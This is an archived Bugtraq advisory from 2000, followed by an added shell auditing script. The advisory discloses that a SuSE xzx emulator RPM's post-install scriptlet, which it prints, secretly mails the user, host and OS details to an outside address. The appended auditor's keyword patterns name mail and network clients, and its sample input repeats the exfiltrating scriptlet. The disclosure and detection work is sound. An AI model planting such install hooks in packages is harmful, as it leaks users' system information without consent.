Bugtraq mailing list archives

Package xzx-2.9.2-2.i386.rpm spies - SuSE Linux 6.4


From: "Gunadi, Prana" <pranalukas () GMX DE>
Date: Mon, 24 Jul 2000 07:28:36 +0200

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

System affected:
=====================
SuSE Linux 6.4
Homepage:
http://www.suse.de/en/produkte/susesoft/linux/Pakete/paket_xzx.html

Package name:
=====================
xzx-2.9.2-2.i386.rpm
XZX is a portable emulator of ZX Spectrum 48K/128K/+3

Problem:
=====================
This program tries to send an unauthorized e-mail during its RPM
installation (PRIVACY problem) to <install () fantasy muc de>

PROOF:
=====================
- From the file /usr/src/RPM/SPECS/xzx.spec (the post installation entry)

== xzx.spec (some snipped) ==
%post
set +x
sm=`type sendmail`
if [ $? -eq 0 ]
then
  set ${sm}
  SENDMAIL=$3
else
  SENDMAIL=/usr/sbin/sendmail
fi
if [ -x ${SENDMAIL} ]
then
  ${SENDMAIL} install () fantasy muc de 2>/dev/null <<- _EOF_
Subject: install notification

Version: %{Name}-%{Version}
Date   : `date`
User   : `whoami`
Host   : `hostname`
OS     : `uname -a`
_EOF_
fi

=== xzx.spec (some snipped) ===

Solution:
Compile from its source instead of installing its RPM package

- --
Prana <pranalukas () gmx de>
http://cyest.hypermart.net
My GnuPG Key ID: 0x33343FD3 (2000-07-21)
Key fingerprint = F1FB 1F76 8866 0F40 A801  D9DA 6BED 6641 3334 3FD3
http://blackhole.pca.dfn.de:11371/pks/lookup?op=get&search=0x33343FD3


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.2 (GNU/Linux)
Comment: Made with Geheimnis

iD8DBQE5e9W2a+1mQTM0P9MRAg3qAJ99Zf18fY9LYscIPfEFPfqfQFxOAgCeNcdZ
XxzcWlviLUn0mESoz9IWi+s=
=J9RT
-----END PGP SIGNATURE-----
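
Added example, not part of the original post: a shell filter that reads the output of `rpm -qp --scripts <package>` and flags scriptlet lines that invoke mail or network clients, or that collect host identity, so that a %post like the one quoted above shows up before the package is installed. The section-header wording it matches, the command lists, and the sample input (modelled on the quoted %post, with a placeholder recipient) are assumptions made for this illustration.

```shell
#!/bin/sh
# Added example: audit RPM scriptlets for outbound-capable commands.
# Intended use: rpm -qp --scripts xzx-2.9.2-2.i386.rpm | audit_scriptlets

audit_scriptlets() {
  awk '
    BEGIN { section = "unknown" }
    # Section headers as printed by rpm --scripts (assumed wording, e.g.
    # "postinstall scriptlet (using /bin/sh):"; older rpm prints "script").
    /^(pre|post)(install|uninstall|trans) (scriptlet|script|program)/ {
      section = $1; next
    }
    {
      # Pad and lowercase so the word-boundary match also catches ${SENDMAIL}.
      l = " " tolower($0) " "
      if (l ~ /[^a-z0-9_](sendmail|mailx?|curl|wget|nc|ftp|telnet)[^a-z0-9_]/)
        printf "%s:%d:egress:%s\n", section, NR, $0
      else if (l ~ /[^a-z0-9_](whoami|hostname|uname)[^a-z0-9_]/)
        printf "%s:%d:hostinfo:%s\n", section, NR, $0
    }
  '
}

# Constructed sample of `rpm -qp --scripts` output, based on the %post
# quoted in the advisory; the recipient address is a placeholder.
sample_scripts() {
  cat <<'EOF'
postinstall scriptlet (using /bin/sh):
sm=`type sendmail`
if [ -x ${SENDMAIL} ]
then
  ${SENDMAIL} collector@example.invalid 2>/dev/null <<- _EOF_
Subject: install notification
User   : `whoami`
Host   : `hostname`
OS     : `uname -a`
_EOF_
fi
postuninstall scriptlet (using /bin/sh):
/sbin/ldconfig
EOF
}

# Demo run: prints section:line:category:text for every flagged line.
sample_scripts | audit_scriptlets
```

Any `egress` hit in a scriptlet deserves a manual read of the full script; `hostinfo` hits matter mainly when they appear next to one.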
